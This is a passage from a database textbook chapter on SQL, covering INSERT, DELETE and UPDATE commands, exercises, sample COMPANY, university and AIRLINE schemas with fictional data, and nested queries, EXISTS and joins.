U3B: INSERT INTO WORKS_ON_INFO ( Emp_name, Proj_name,
Hours_per_week )

SELECT E.Lname, P.Pname, W.Hours
FROM PROJECT P, WORKS_ON W, EMPLOYEE E
WHERE P.Pnumber=W.Pno AND W.Essn=E.Ssn;

A table WORKS_ON_INFO is created by U3A and is loaded with the joined informa-
tion retrieved from the database by the query in U3B. We can now query
WORKS_ON_INFO as we would any other relation; when we do not need it any
more, we can remove it by using the DROP TABLE command. Notice that the
WORKS_ON_INFO table may not be up-to-date; that is, if we update any of the
PROJECT, WORKS_ON, or EMPLOYEE relations after issuing U3B, the information
in WORKS_ON_INFO may become outdated. We have to create a view to keep such a
table up-to-date.

4.2 The DELETE Command
The DELETE command removes tuples from a relation. It includes a WHERE clause,
similar to that used in an SQL query, to select the tuples to be deleted. Tuples are
explicitly deleted from only one table at a time. However, the deletion may propa-
gate to tuples in other relations if referential triggered actions are specified in the ref-
erential integrity constraints of the DDL (see Section 2.2).12 Depending on the
number of tuples selected by the condition in the WHERE clause, zero, one, or sev-
eral tuples can be deleted by a single DELETE command. A missing WHERE clause
specifies that all tuples in the relation are to be deleted; however, the table remains
in the database as an empty table. We must use the DROP TABLE command to
remove the table definition. The DELETE commands in U4A to U4D, if applied inde-
pendently to the database in Figure A.3, will delete zero, one, four, and all tuples,
respectively, from the EMPLOYEE relation:

U4A: DELETE FROM EMPLOYEE
WHERE Lname=‘Brown’;

U4B: DELETE FROM EMPLOYEE
WHERE Ssn=‘123456789’;

U4C: DELETE FROM EMPLOYEE
WHERE Dno=5;

U4D: DELETE FROM EMPLOYEE;

4.3 The UPDATE Command
The UPDATE command is used to modify attribute values of one or more selected
tuples. As in the DELETE command, a WHERE clause in the UPDATE command
selects the tuples to be modified from a single relation. However, updating a

12Other actions can be automatically applied through triggers and other mechanisms.

104

Basic SQL

primary key value may propagate to the foreign key values of tuples in other rela-
tions if such a referential triggered action is specified in the referential integrity con-
straints of the DDL (see Section 2.2). An additional SET clause in the UPDATE
command specifies the attributes to be modified and their new values. For example,
to change the location and controlling department number of project number 10 to
‘Bellaire’ and 5, respectively, we use U5:

U5: UPDATE PROJECT
SET Plocation = ‘Bellaire’, Dnum = 5
WHERE Pnumber=10;

Several tuples can be modified with a single UPDATE command. An example is to
give all employees in the ‘Research’ department a 10 percent raise in salary, as shown
in U6. In this request, the modified Salary value depends on the original Salary value
in each tuple, so two references to the Salary attribute are needed. In the SET clause,
the reference to the Salary attribute on the right refers to the old Salary value before
modification, and the one on the left refers to the new Salary value after modification:

U6: UPDATE EMPLOYEE
SET Salary = Salary * 1.1
WHERE Dno = 5;

It is also possible to specify NULL or DEFAULT as the new attribute value. Notice that
each UPDATE command explicitly refers to a single relation only. To modify multiple
relations, we must issue several UPDATE commands.

5 Additional Features of SQL
SQL has a number of additional features that we have not described in this chapter.
These are as follows:

■ There are: various techniques for specifying complex retrieval queries,
including nested queries, aggregate functions, grouping, joined tables, outer
joins, and recursive queries; SQL views, triggers, and assertions; and com-
mands for schema modification.

■ SQL has various techniques for writing programs in various programming
languages that include SQL statements to access one or more databases.
These include embedded (and dynamic) SQL, SQL/CLI (Call Level
Interface) and its predecessor ODBC (Open Data Base Connectivity), and
SQL/PSM (Persistent Stored Modules). Also, one can access SQL databases
through the Java programming language using JDBC and SQLJ.

■ Each commercial RDBMS will have, in addition to the SQL commands, a set
of commands for specifying physical database design parameters, file struc-
tures for relations, and access paths such as indexes. We call these commands
a storage definition language (SDL). Earlier versions of SQL had commands

105

Basic SQL

for creating indexes, but these were removed from the language because
they were not at the conceptual schema level. Many systems still have the
CREATE INDEX commands.

■ SQL has transaction control commands. These are used to specify units of
database processing for concurrency control and recovery purposes.

■ SQL has language constructs for specifying the granting and revoking of priv-
ileges to users. Privileges typically correspond to the right to use certain SQL
commands to access certain relations. Each relation is assigned an owner,
and either the owner or the DBA staff can grant to selected users the privi-
lege to use an SQL statement—such as SELECT, INSERT, DELETE, or
UPDATE—to access the relation. In addition, the DBA staff can grant the
privileges to create schemas, tables, or views to certain users. These SQL
commands—called GRANT and REVOKE—arise in database security and
authorization discussion.

■ SQL has language constructs for creating triggers. These are generally
referred to as active database techniques, since they specify actions that are
automatically triggered by events such as database updates.

■ SQL has incorporated many features from object-oriented models to have
more powerful capabilities, leading to enhanced relational systems known as
object-relational. Capabilities exist for such actions as creating complex-
structured attributes (also called nested relations), specifying abstract data
types (called UDTs or user-defined types) for attributes and tables, creating
object identifiers for referencing tuples, and specifying operations on types.

■ SQL and relational databases can interact with new technologies such as
XML and OLAP.

6 Summary
In this chapter we presented the SQL database language. This language and its vari-
ations have been implemented as interfaces to many commercial relational DBMSs,
including Oracle’s Oracle and Rdb13; IBM’s DB2, Informix Dynamic Server, and
SQL/DS; Microsoft’s SQL Server and Access; and INGRES. Some open source sys-
tems also provide SQL, such as MySQL and PostgreSQL. The original version of
SQL was implemented in the experimental DBMS called SYSTEM R, which was
developed at IBM Research. SQL is designed to be a comprehensive language that
includes statements for data definition, queries, updates, constraint specification,
and view definition. We discussed the following features of SQL in this chapter: the
data definition commands for creating tables, commands for constraint specifica-
tion, simple retrieval queries, and database update commands.

13Rdb was originally produced by Digital Equipment Corporation. It was acquired by Oracle from Digital in
1994 and is being supported and enhanced.

106

Basic SQL

Review Questions
1. How do the relations (tables) in SQL differ from the relations defined for-

mally? Discuss the other differences in terminology. Why does SQL allow
duplicate tuples in a table or in a query result?

2. List the data types that are allowed for SQL attributes.

3. How does SQL allow implementation of entity integrity and referential
integrity constraints? What about referential triggered actions?

4. Describe the four clauses in the syntax of a simple SQL retrieval query. Show
what type of constructs can be specified in each of the clauses. Which are
required and which are optional?

Exercises
5. Consider the database shown in Figure A.4, whose schema is shown in

Figure A.5. What are the referential integrity constraints that should hold on
the schema? Write appropriate SQL DDL statements to define the database.

6. Repeat Exercise 5, but use the AIRLINE database schema of Figure A.6.

7. Consider the LIBRARY relational database schema shown in Figure 6. Choose
the appropriate action (reject, cascade, set to NULL, set to default) for each
referential integrity constraint, both for the deletion of a referenced tuple and
for the update of a primary key attribute value in a referenced tuple. Justify
your choices.

8. Write appropriate SQL DDL statements for declaring the LIBRARY relational
database schema of Figure 6. Specify the keys and referential triggered
actions.

9. How can the key and foreign key constraints be enforced by the DBMS? Is
the enforcement technique you suggest difficult to implement? Can the con-
straint checks be executed efficiently when updates are applied to the data-
base?

10. Specify the following queries in SQL on the COMPANY relational database
schema shown in Figure A.2. Show the result of each query if it is applied to
the COMPANY database in Figure A.3.

a. Retrieve the names of all employees in department 5 who work more than
10 hours per week on the ProductX project.

b. List the names of all employees who have a dependent with the same first
name as themselves.

c. Find the names of all employees who are directly supervised by ‘Franklin
Wong’.

107

Basic SQL

Publisher_nameBook_id Title

BOOK

BOOK_COPIES
Book_id Branch_id No_of_copies

BOOK_AUTHORS

Book_id Author_name

LIBRARY_BRANCH
Branch_id Branch_name Address

PUBLISHER

Name Address Phone

BOOK_LOANS

Book_id Branch_id Card_no Date_out Due_date

BORROWER
Card_no Name Address Phone

Figure 6
A relational database
schema for a
LIBRARY database.

11. Specify the updates of Exercise 11 from the chapter “The Relational Data Model
and Relational Database Constraints” using the SQL update commands.

12. Specify the following queries in SQL on the database schema of Figure A.4.

a. Retrieve the names of all senior students majoring in ‘CS’ (computer sci-
ence).

b. Retrieve the names of all courses taught by Professor King in 2007 and
2008.

c. For each section taught by Professor King, retrieve the course number,
semester, year, and number of students who took the section.

d. Retrieve the name and transcript of each senior student (Class = 4)
majoring in CS. A transcript includes course name, course number, credit
hours, semester, year, and grade for each course completed by the student.

108

Basic SQL

13. Write SQL update statements to do the following on the database schema
shown in Figure A.4.

a. Insert a new student, <‘Johnson’, 25, 1, ‘Math’>, in the database.

b. Change the class of student ‘Smith’ to 2.

c. Insert a new course, <‘Knowledge Engineering’, ‘CS4390’, 3, ‘CS’>.

d. Delete the record for the student whose name is ‘Smith’ and whose stu-
dent number is 17.

14. Design a relational database schema for a database application of your
choice.

a. Declare your relations, using the SQL DDL.

b. Specify a number of queries in SQL that are needed by your database
application.

c. Based on your expected use of the database, choose some attributes that
should have indexes specified on them.

d. Implement your database, if you have a DBMS that supports SQL.

15. Consider the EMPLOYEE table’s constraint EMPSUPERFK as specified in
Figure 2 is changed to read as follows:

CONSTRAINT EMPSUPERFK
FOREIGN KEY (Super_ssn) REFERENCES EMPLOYEE(Ssn)

ON DELETE CASCADE ON UPDATE CASCADE,

Answer the following questions:

a. What happens when the following command is run on the database state
shown in Figure A.3?

DELETE EMPLOYEE WHERE Lname = ‘Borg’

b. Is it better to CASCADE or SET NULL in case of EMPSUPERFK constraint
ON DELETE?

16. Write SQL statements to create a table EMPLOYEE_BACKUP to back up the
EMPLOYEE table shown in Figure A.3.

Selected Bibliography
The SQL language, originally named SEQUEL, was based on the language SQUARE
(Specifying Queries as Relational Expressions), described by Boyce et al. (1975). The
syntax of SQUARE was modified into SEQUEL (Chamberlin and Boyce, 1974) and
then into SEQUEL 2 (Chamberlin et al. 1976), on which SQL is based. The original
implementation of SEQUEL was done at IBM Research, San Jose, California.

109

DEPARTMENT

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

EMPLOYEE

DEPT_LOCATIONS

Dnumber Dlocation

PROJECT

Pname Pnumber Plocation Dnum

WORKS_ON

Essn Pno Hours

DEPENDENT

Essn Dependent_name Sex Bdate Relationship

Dname Dnumber Mgr_ssn Mgr_start_date

Figure A.1
Referential integrity constraints displayed
on the COMPANY relational database
schema.

DEPARTMENT

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

EMPLOYEE

DEPT_LOCATIONS

Dnumber Dlocation

PROJECT

Pname Pnumber Plocation Dnum

WORKS_ON

Essn Pno Hours

DEPENDENT

Essn Dependent_name Sex Bdate Relationship

Dname Dnumber Mgr_ssn Mgr_start_date

Figure A.2
Schema diagram for the
COMPANY relational
database schema.

110

DEPT_LOCATIONS

Dnumber

Houston

Stafford

Bellaire

Sugarland

Dlocation

DEPARTMENT

Dname

Research

Administration

Headquarters 1

5

4

888665555

333445555

987654321

1981-06-19

1988-05-22

1995-01-01

Dnumber Mgr_ssn Mgr_start_date

WORKS_ON

Essn

123456789

123456789

666884444

453453453

453453453

333445555

333445555

333445555

333445555

999887777

999887777

987987987

987987987

987654321

987654321

888665555

3

1

2

2

1

2

30

30

30

10

10

3

10

20

20

20

40.0

32.5

7.5

10.0

10.0

10.0

10.0

20.0

20.0

30.0

5.0

10.0

35.0

20.0

15.0

NULL

Pno Hours

PROJECT

Pname

ProductX

ProductY

ProductZ

Computerization

Reorganization

Newbenefits

3

1

2

30

10

20

5

5

5

4

4

1

Houston

Bellaire

Sugarland

Stafford

Stafford

Houston

Pnumber Plocation Dnum

DEPENDENT

333445555

333445555

333445555

987654321

123456789

123456789

123456789

Joy

Alice F

M

F

M

M

F

F

1986-04-05

1983-10-25

1958-05-03

1942-02-28

1988-01-04

1988-12-30

1967-05-05

Theodore

Alice

Elizabeth

Abner

Michael

Spouse

Daughter

Son

Daughter

Spouse

Spouse

Son

Dependent_name Sex Bdate Relationship

EMPLOYEE

Fname

John

Franklin

Jennifer

Alicia

Ramesh

Joyce

James

Ahmad

Narayan

English

Borg

Jabbar

666884444

453453453

888665555

987987987

F

F

M

M

M

M

M

F

4

4

5

5

4

1

5

5

25000

43000

30000

40000

25000

55000

38000

25000

987654321

888665555

333445555

888665555

987654321

NULL

333445555

333445555

Zelaya

Wallace

Smith

Wong

3321 Castle, Spring, TX

291 Berry, Bellaire, TX

731 Fondren, Houston, TX

638 Voss, Houston, TX

1968-01-19

1941-06-20

1965-01-09

1955-12-08

1969-03-29

1937-11-10

1962-09-15

1972-07-31

980 Dallas, Houston, TX

450 Stone, Houston, TX

975 Fire Oak, Humble, TX

5631 Rice, Houston, TX

999887777

987654321

123456789

333445555

Minit Lname Ssn Bdate Address Sex DnoSalary Super_ssn

B

T

J

S

K

A

V

E

Houston

1

4

5

5

Essn

5

Figure A.3
One possible database state for the COMPANY relational database schema.

Basic SQL

111

Basic SQL

Name Student_number Class Major

Smith 17 1 CS

Brown 8 2 CS

STUDENT

Course_name Course_number Credit_hours Department

Intro to Computer Science CS1310 4 CS

Data Structures CS3320 4 CS

Discrete Mathematics MATH2410 3 MATH

Database CS3380 3 CS

COURSE

Section_identifier Course_number Semester Year Instructor

85 MATH2410 Fall 07 King

92 CS1310 Fall 07 Anderson

102 CS3320 Spring 08 Knuth

112 MATH2410 Fall 08 Chang

119 CS1310 Fall 08 Anderson

135 CS3380 Fall 08 Stone

SECTION

Student_number Section_identifier Grade

17 112 B

17 119 C

8 85 A

8 92 A

8 102 B

8 135 A

GRADE_REPORT

Course_number Prerequisite_number

CS3380 CS3320

CS3380 MATH2410

CS3320 CS1310

PREREQUISITE

Figure A.4
A database that stores
student and course
information.

112

Basic SQL

Section_identifier SemesterCourse_number InstructorYear

SECTION

Course_name Course_number Credit_hours Department

COURSE

Name Student_number Class Major

STUDENT

Course_number Prerequisite_number
PREREQUISITE

Student_number GradeSection_identifier

GRADE_REPORT

Figure A.5
Schema diagram for the
database in Figure A.4.

113

Basic SQL

AIRPORT
Airport_code Name City State

Flight_number Airline Weekdays

FLIGHT

FLIGHT_LEG
Flight_number Leg_number Departure_airport_code Scheduled_departure_time

Scheduled_arrival_timeArrival_airport_code

LEG_INSTANCE

Flight_number Leg_number Date Number_of_available_seats Airplane_id

FARE

Flight_number Fare_code Amount Restrictions

AIRPLANE_TYPE
Airplane_type_name Max_seats Company

CAN_LAND
Airplane_type_name Airport_code

AIRPLANE
Airplane_id Total_number_of_seats Airplane_type

SEAT_RESERVATION
Leg_number Date Seat_number Customer_name Customer_phoneFlight_number

Arrival_timeArrival_airport_codeDeparture_timeDeparture_airport_code

Figure A.6
The AIRLINE relational database schema.

114

More SQL: Complex Queries,
Triggers, Views, and

Schema Modification

This chapter describes somewhat advanced featuresof the SQL language standard for relational data-
bases. We start in Section 1 by presenting more complex features of SQL retrieval
queries, such as nested queries, joined tables, outer joins, aggregate functions, and
grouping. In Section 2, we describe the CREATE ASSERTION statement, which
allows the specification of more general constraints on the database. We also intro-
duce the concept of triggers and the CREATE TRIGGER statement. Then, in Section
3, we describe the SQL facility for defining views on the database. Views are also
called virtual or derived tables because they present the user with what appear to be
tables; however, the information in those tables is derived from previously defined
tables. Section 4 introduces the SQL ALTER TABLE statement, which is used for
modifying the database tables and constraints. Section 5 is the chapter summary.

1 More Complex SQL Retrieval Queries
Recall basic types of retrieval queries in SQL. Because of the generality and expres-
sive power of the language, there are many additional features that allow users to
specify more complex retrievals from the database. We discuss several of these fea-
tures in this section.

From Chapter 5 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.

115

More SQL: Complex Queries, Triggers, Views, and Schema Modification

1.1 Comparisons Involving NULL
and Three-Valued Logic

SQL has various rules for dealing with NULL values. Recall that NULL is used to repre-
sent a missing value, but that it usually has one of three different interpretations—
value unknown (exists but is not known), value not available (exists but is purposely
withheld), or value not applicable (the attribute is undefined for this tuple). Consider
the following examples to illustrate each of the meanings of NULL.

1. Unknown value. A person’s date of birth is not known, so it is represented
by NULL in the database.

2. Unavailable or withheld value. A person has a home phone but does not
want it to be listed, so it is withheld and represented as NULL in the database.

3. Not applicable attribute. An attribute LastCollegeDegree would be NULL for
a person who has no college degrees because it does not apply to that person.

It is often not possible to determine which of the meanings is intended; for example,
a NULL for the home phone of a person can have any of the three meanings. Hence,
SQL does not distinguish between the different meanings of NULL.

In general, each individual NULL value is considered to be different from every other
NULL value in the various database records. When a NULL is involved in a compari-
son operation, the result is considered to be UNKNOWN (it may be TRUE or it may
be FALSE). Hence, SQL uses a three-valued logic with values TRUE, FALSE, and
UNKNOWN instead of the standard two-valued (Boolean) logic with values TRUE or
FALSE. It is therefore necessary to define the results (or truth values) of three-valued
logical expressions when the logical connectives AND, OR, and NOT are used. Table 1
shows the resulting values.

Table 1 Logical Connectives in Three-Valued Logic

(a) AND TRUE FALSE UNKNOWN

TRUE TRUE FALSE UNKNOWN

FALSE FALSE FALSE FALSE

UNKNOWN UNKNOWN FALSE UNKNOWN

(b) OR TRUE FALSE UNKNOWN

TRUE TRUE TRUE TRUE

FALSE TRUE FALSE UNKNOWN

UNKNOWN TRUE UNKNOWN UNKNOWN

(c) NOT

TRUE FALSE

FALSE TRUE

UNKNOWN UNKNOWN

116

More SQL: Complex Queries, Triggers, Views, and Schema Modification

In Tables 1(a) and 1(b), the rows and columns represent the values of the results of
comparison conditions, which would typically appear in the WHERE clause of an
SQL query. Each expression result would have a value of TRUE, FALSE, or
UNKNOWN. The result of combining the two values using the AND logical connec-
tive is shown by the entries in Table 1(a). Table 1(b) shows the result of using the OR
logical connective. For example, the result of (FALSE AND UNKNOWN) is FALSE,
whereas the result of (FALSE OR UNKNOWN) is UNKNOWN. Table 1(c) shows the
result of the NOT logical operation. Notice that in standard Boolean logic, only
TRUE or FALSE values are permitted; there is no UNKNOWN value.

In select-project-join queries, the general rule is that only those combinations of
tuples that evaluate the logical expression in the WHERE clause of the query to
TRUE are selected. Tuple combinations that evaluate to FALSE or UNKNOWN are not
selected. However, there are exceptions to that rule for certain operations, such as
outer joins, as we shall see in Section 1.6.

SQL allows queries that check whether an attribute value is NULL. Rather than using
= or <> to compare an attribute value to NULL, SQL uses the comparison operators
IS or IS NOT. This is because SQL considers each NULL value as being distinct from
every other NULL value, so equality comparison is not appropriate. It follows that
when a join condition is specified, tuples with NULL values for the join attributes are
not included in the result (unless it is an OUTER JOIN; see Section 1.6). Query 18
illustrates this.

Query 18. Retrieve the names of all employees who do not have supervisors.

Q18: SELECT Fname, Lname
FROM EMPLOYEE
WHERE Super_ssn IS NULL;

1.2 Nested Queries, Tuples,
and Set/Multiset Comparisons

Some queries require that existing values in the database be fetched and then used
in a comparison condition. Such queries can be conveniently formulated by using
nested queries, which are complete select-from-where blocks within the WHERE
clause of another query. That other query is called the outer query. Query 4 is for-
mulated in Q4 without a nested query, but it can be rephrased to use nested queries
as shown in Q4A. Q4A introduces the comparison operator IN, which compares a
value v with a set (or multiset) of values V and evaluates to TRUE if v is one of the
elements in V.

The first nested query selects the project numbers of projects that have an employee
with last name ‘Smith’ involved as manager, while the second nested query selects
the project numbers of projects that have an employee with last name ‘Smith’
involved as worker. In the outer query, we use the OR logical connective to retrieve a
PROJECT tuple if the PNUMBER value of that tuple is in the result of either nested
query.

117

More SQL: Complex Queries, Triggers, Views, and Schema Modification

Q4A: SELECT DISTINCT Pnumber
FROM PROJECT
WHERE Pnumber IN

( SELECT Pnumber
FROM PROJECT, DEPARTMENT, EMPLOYEE
WHERE Dnum=Dnumber AND

Mgr_ssn=Ssn AND Lname=‘Smith’ )
OR
Pnumber IN
( SELECT Pno

FROM WORKS_ON, EMPLOYEE
WHERE Essn=Ssn AND Lname=‘Smith’ );

If a nested query returns a single attribute and a single tuple, the query result will be
a single (scalar) value. In such cases, it is permissible to use = instead of IN for the
comparison operator. In general, the nested query will return a table (relation),
which is a set or multiset of tuples.

SQL allows the use of tuples of values in comparisons by placing them within
parentheses. To illustrate this, consider the following query:

SELECT DISTINCT Essn
FROM WORKS_ON
WHERE (Pno, Hours) IN ( SELECT Pno, Hours

FROM WORKS_ON
WHERE Essn=‘123456789’ );

This query will select the Essns of all employees who work the same (project, hours)
combination on some project that employee ‘John Smith’ (whose Ssn =
‘123456789’) works on. In this example, the IN operator compares the subtuple of
values in parentheses (Pno, Hours) within each tuple in WORKS_ON with the set of
type-compatible tuples produced by the nested query.

In addition to the IN operator, a number of other comparison operators can be used
to compare a single value v (typically an attribute name) to a set or multiset v (typ-
ically a nested query). The = ANY (or = SOME) operator returns TRUE if the value v
is equal to some value in the set V and is hence equivalent to IN. The two keywords
ANY and SOME have the same effect. Other operators that can be combined with
ANY (or SOME) include >, >=, <, <=, and <>. The keyword ALL can also be com-
bined with each of these operators. For example, the comparison condition (v > ALL
V) returns TRUE if the value v is greater than all the values in the set (or multiset) V.
An example is the following query, which returns the names of employees whose
salary is greater than the salary of all the employees in department 5:

SELECT Lname, Fname
FROM EMPLOYEE
WHERE Salary > ALL ( SELECT Salary

FROM EMPLOYEE
WHERE Dno=5 );

118

More SQL: Complex Queries, Triggers, Views, and Schema Modification

Notice that this query can also be specified using the MAX aggregate function (see
Section 1.7).

In general, we can have several levels of nested queries. We can once again be faced
with possible ambiguity among attribute names if attributes of the same name
exist—one in a relation in the FROM clause of the outer query, and another in a rela-
tion in the FROM clause of the nested query. The rule is that a reference to an
unqualified attribute refers to the relation declared in the innermost nested query.
For example, in the SELECT clause and WHERE clause of the first nested query of
Q4A, a reference to any unqualified attribute of the PROJECT relation refers to the
PROJECT relation specified in the FROM clause of the nested query. To refer to an
attribute of the PROJECT relation specified in the outer query, we specify and refer
to an alias (tuple variable) for that relation. These rules are similar to scope rules for
program variables in most programming languages that allow nested procedures
and functions. To illustrate the potential ambiguity of attribute names in nested
queries, consider Query 16.

Query 16. Retrieve the name of each employee who has a dependent with the
same first name and is the same sex as the employee.

Q16: SELECT E.Fname, E.Lname
FROM EMPLOYEE AS E
WHERE E.Ssn IN ( SELECT Essn

FROM DEPENDENT AS D
WHERE E.Fname=D.Dependent_name

AND E.Sex=D.Sex );

In the nested query of Q16, we must qualify E.Sex because it refers to the Sex attrib-
ute of EMPLOYEE from the outer query, and DEPENDENT also has an attribute
called Sex. If there were any unqualified references to Sex in the nested query, they
would refer to the Sex attribute of DEPENDENT. However, we would not have to
qualify the attributes Fname and Ssn of EMPLOYEE if they appeared in the nested
query because the DEPENDENT relation does not have attributes called Fname and
Ssn, so there is no ambiguity.

It is generally advisable to create tuple variables (aliases) for all the tables referenced
in an SQL query to avoid potential errors and ambiguities, as illustrated in Q16.

1.3 Correlated Nested Queries
Whenever a condition in the WHERE clause of a nested query references some attrib-
ute of a relation declared in the outer query, the two queries are said to be correlated.
We can understand a correlated query better by considering that the nested query is
evaluated once for each tuple (or combination of tuples) in the outer query. For exam-
ple, we can think of Q16 as follows: For each EMPLOYEE tuple, evaluate the nested
query, which retrieves the Essn values for all DEPENDENT tuples with the same sex
and name as that EMPLOYEE tuple; if the Ssn value of the EMPLOYEE tuple is in the
result of the nested query, then select that EMPLOYEE tuple.

119

More SQL: Complex Queries, Triggers, Views, and Schema Modification

In general, a query written with nested select-from-where blocks and using the = or
IN comparison operators can always be expressed as a single block query. For exam-
ple, Q16 may be written as in Q16A:

Q16A: SELECT E.Fname, E.Lname
FROM EMPLOYEE AS E, DEPENDENT AS D
WHERE E.Ssn=D.Essn AND E.Sex=D.Sex

AND E.Fname=D.Dependent_name;

1.4 The EXISTS and UNIQUE Functions in SQL
The EXISTS function in SQL is used to check whether the result of a correlated
nested query is empty (contains no tuples) or not. The result of EXISTS is a Boolean
value TRUE if the nested query result contains at least one tuple, or FALSE if the
nested query result contains no tuples. We illustrate the use of EXISTS—and NOT
EXISTS—with some examples. First, we formulate Query 16 in an alternative form
that uses EXISTS as in Q16B:

Q16B: SELECT E.Fname, E.Lname
FROM EMPLOYEE AS E
WHERE EXISTS ( SELECT *

FROM DEPENDENT AS D
WHERE E.Ssn=D.Essn AND E.Sex=D.Sex

AND E.Fname=D.Dependent_name);

EXISTS and NOT EXISTS are typically used in conjunction with a correlated nested
query. In Q16B, the nested query references the Ssn, Fname, and Sex attributes of the
EMPLOYEE relation from the outer query. We can think of Q16B as follows: For each
EMPLOYEE tuple, evaluate the nested query, which retrieves all DEPENDENT tuples
with the same Essn, Sex, and Dependent_name as the EMPLOYEE tuple; if at least one
tuple EXISTS in the result of the nested query, then select that EMPLOYEE tuple. In
general, EXISTS(Q) returns TRUE if there is at least one tuple in the result of the
nested query Q, and it returns FALSE otherwise. On the other hand, NOT EXISTS(Q)
returns TRUE if there are no tuples in the result of nested query Q, and it returns
FALSE otherwise. Next, we illustrate the use of NOT EXISTS.

Query 6. Retrieve the names of employees who have no dependents.

Q6: SELECT Fname, Lname
FROM EMPLOYEE
WHERE NOT EXISTS ( SELECT *

FROM DEPENDENT
WHERE Ssn=Essn );

In Q6, the correlated nested query retrieves all DEPENDENT tuples related to a par-
ticular EMPLOYEE tuple. If none exist, the EMPLOYEE tuple is selected because the
WHERE-clause condition will evaluate to TRUE in this case. We can explain Q6 as
follows: For each EMPLOYEE tuple, the correlated nested query selects all
DEPENDENT tuples whose Essn value matches the EMPLOYEE Ssn; if the result is

120

More SQL: Complex Queries, Triggers, Views, and Schema Modification

empty, no dependents are related to the employee, so we select that EMPLOYEE
tuple and retrieve its Fname and Lname.

Query 7. List the names of managers who have at least one dependent.

Q7: SELECT Fname, Lname
FROM EMPLOYEE
WHERE EXISTS ( SELECT *

FROM DEPENDENT
WHERE Ssn=Essn )

AND
EXISTS ( SELECT *

FROM DEPARTMENT
WHERE Ssn=Mgr_ssn );

One way to write this query is shown in Q7, where we specify two nested correlated
queries; the first selects all DEPENDENT tuples related to an EMPLOYEE, and the sec-
ond selects all DEPARTMENT tuples managed by the EMPLOYEE. If at least one of the
first and at least one of the second exists, we select the EMPLOYEE tuple. Can you
rewrite this query using only a single nested query or no nested queries?

The query Q3: Retrieve the name of each employee who works on all the projects con-
trolled by department number 5 can be written using EXISTS and NOT EXISTS in SQL
systems. We show two ways of specifying this query Q3 in SQL as Q3A and Q3B.
This is an example of certain types of queries that require universal quantification.
One way to write this query is to use the construct (S2 EXCEPT S1) as explained
next, and checking whether the result is empty.1 This option is shown as Q3A.

Q3A: SELECT Fname, Lname
FROM EMPLOYEE
WHERE NOT EXISTS ( ( SELECT Pnumber

FROM PROJECT
WHERE Dnum=5)
EXCEPT ( SELECT Pno

FROM WORKS_ON
WHERE Ssn=Essn) );

In Q3A, the first subquery (which is not correlated with the outer query) selects all
projects controlled by department 5, and the second subquery (which is correlated)
selects all projects that the particular employee being considered works on. If the set
difference of the first subquery result MINUS (EXCEPT) the second subquery result is
empty, it means that the employee works on all the projects and is therefore selected.

The second option is shown as Q3B. Notice that we need two-level nesting in Q3B
and that this formulation is quite a bit more complex than Q3A, which uses NOT
EXISTS and EXCEPT.

1Recall that EXCEPT is the set difference operator. The keyword MINUS is also sometimes used, for
example, in Oracle.

121

More SQL: Complex Queries, Triggers, Views, and Schema Modification

Q3B: SELECT Lname, Fname
FROM EMPLOYEE
WHERE NOT EXISTS ( SELECT *

FROM WORKS_ON B
WHERE ( B.Pno IN ( SELECT Pnumber

FROM PROJECT
WHERE Dnum=5 )

AND
NOT EXISTS ( SELECT *

FROM WORKS_ON C
WHERE C.Essn=Ssn
AND C.Pno=B.Pno )));

In Q3B, the outer nested query selects any WORKS_ON (B) tuples whose Pno is of a
project controlled by department 5, if there is not a WORKS_ON (C) tuple with the
same Pno and the same Ssn as that of the EMPLOYEE tuple under consideration in
the outer query. If no such tuple exists, we select the EMPLOYEE tuple. The form of
Q3B matches the following rephrasing of Query 3: Select each employee such
that there does not exist a project controlled by department 5 that the employee
does not work on. It corresponds to the way we will write this query in tuple relation
calculus.

There is another SQL function, UNIQUE(Q), which returns TRUE if there are no
duplicate tuples in the result of query Q; otherwise, it returns FALSE. This can be
used to test whether the result of a nested query is a set or a multiset.

1.5 Explicit Sets and Renaming of Attributes in SQL
We have seen several queries with a nested query in the WHERE clause. It is also pos-
sible to use an explicit set of values in the WHERE clause, rather than a nested
query. Such a set is enclosed in parentheses in SQL.

Query 17. Retrieve the Social Security numbers of all employees who work on
project numbers 1, 2, or 3.

Q17: SELECT DISTINCT Essn
FROM WORKS_ON
WHERE Pno IN (1, 2, 3);

In SQL, it is possible to rename any attribute that appears in the result of a query by
adding the qualifier AS followed by the desired new name. Hence, the AS construct
can be used to alias both attribute and relation names, and it can be used in both the
SELECT and FROM clauses. For example, Q8A shows how query Q8 from the chapter
Basic SQL can be slightly changed to retrieve the last name of each employee and his
or her supervisor, while renaming the resulting attribute names as Employee_name and
Supervisor_name. The new names will appear as column headers in the query result.

Q8A: SELECT E.Lname AS Employee_name, S.Lname AS Supervisor_name
FROM EMPLOYEE AS E, EMPLOYEE AS S
WHERE E.Super_ssn=S.Ssn;

122

More SQL: Complex Queries, Triggers, Views, and Schema Modification

1.6 Joined Tables in SQL and Outer Joins
The concept of a joined table (or joined relation) was incorporated into SQL to
permit users to specify a table resulting from a join operation in the FROM clause of
a query. This construct may be easier to comprehend than mixing together all the
select and join conditions in the WHERE clause. For example, consider query Q1,
which retrieves the name and address of every employee who works for the
‘Research’ department. It may be easier to specify the join of the EMPLOYEE and
DEPARTMENT relations first, and then to select the desired tuples and attributes.
This can be written in SQL as in Q1A:

Q1A: SELECT Fname, Lname, Address
FROM (EMPLOYEE JOIN DEPARTMENT ON Dno=Dnumber)
WHERE Dname=‘Research’;

The FROM clause in Q1A contains a single joined table. The attributes of such a table
are all the attributes of the first table, EMPLOYEE, followed by all the attributes of
the second table, DEPARTMENT. The concept of a joined table also allows the user to
specify different types of join, such as NATURAL JOIN and various types of OUTER
JOIN. In a NATURAL JOIN on two relations R and S, no join condition is specified; an
implicit EQUIJOIN condition for each pair of attributes with the same name from R
and S is created. Each such pair of attributes is included only once in the resulting
relation.

If the names of the join attributes are not the same in the base relations, it is possi-
ble to rename the attributes so that they match, and then to apply NATURAL JOIN. In
this case, the AS construct can be used to rename a relation and all its attributes in
the FROM clause. This is illustrated in Q1B, where the DEPARTMENT relation is
renamed as DEPT and its attributes are renamed as Dname, Dno (to match the name
of the desired join attribute Dno in the EMPLOYEE table), Mssn, and Msdate. The
implied join condition for this NATURAL JOIN is EMPLOYEE.Dno=DEPT.Dno,
because this is the only pair of attributes with the same name after renaming:

Q1B: SELECT Fname, Lname, Address
